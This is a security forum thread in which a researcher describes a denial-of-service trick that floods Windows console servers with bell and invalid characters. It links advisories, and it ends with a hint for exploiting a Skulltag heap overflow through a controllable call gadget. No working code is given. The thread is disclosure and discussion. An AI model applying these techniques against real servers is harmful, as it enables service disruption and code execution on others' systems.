Luigi Auriemma

I admit that this type of Denial of Service is probably the most stupid thing I have found but it works and works very well too!

Today I have released a couple of advisories which contains also references to this bug, so you could be interested in taking a look to them:

http://aluigi.org/adv/unrwebdos-adv.txt
http://aluigi.org/adv/toribashish-adv.txt

I have already searched on internet some days ago and found nothing related to this problem so now I will spend some words about it.

As probably all the people which have played with the Windows console already know, there is an annoying problem which happens when invalid chars are visualized on the screen.
In my tests seems that on Windows 9x the problem isn't too much while on Windows XP (and 2k too probably) it's an hell.

How many time you have been remained with the console freezed and the sound speaker yelling while playing with netcat and services which use non-textual data?
The last time this happened to me was at job and the system slowed so quickly that toke me many seconds to kill that damned process with all my collegues watching me... ah ah ah

Anyway this stupid effect of the invalid and bell chars can be used as attack versus servers which run in console and visualize the user's input.
The only requirements are:
- ability to visualize many chars
- no restrictions on the chars, it's important that at least the bell char 0x07 is visualized
- naturally the Window console

The effects are a great slowness of the entire system, the process which is completely freezed (DoS) and the absurd noisy sound you must hear.

Not an attack which will remain in the history but if you are going to test a server which works in console you should care about this type of problem too since the effects work and it can be used in a real attack scenario.

Oh nice luigi great work dude,I looked into the replay file but the stack become so corrupted i gave up m8.

today have released another couple of advisories about this type of bug.
if someone has tested them (in a real or test scenario) would be cool to know what do you think about them

Just got back online luigi i will take a look after i've had a cupa a chocolate m8,And comment on this.Love it when there are a load of advisory's found i think you have little elves working for you lol.See if i can get some poc code's wrote for at least one of them.Of course if you don't mind Luigi.As i know your don't like messing with shell code and stuff like that.

You know what i think is good is that you are willing to try and go into uncharted water's by this i mean your willing to try new stuff like these types of bug's you have found.This is what the security industry need's.

Some one has been bussy :D.

Arghh these damned elves are mad ih ih ih
At the moment my bugs queue is empty so no advisories for the next days.
If you like challenges you could like to write an exploit for the Skulltag heap-overflow, I have debugged it and there is a possibility to control the code flow... sure I'm not an expert in hof exploitation so I'm the last person on the earth which should talk about this but there is a nice "mov eax, [edi+10]; call eax" which is very insteresting moreover because edi is controlled by us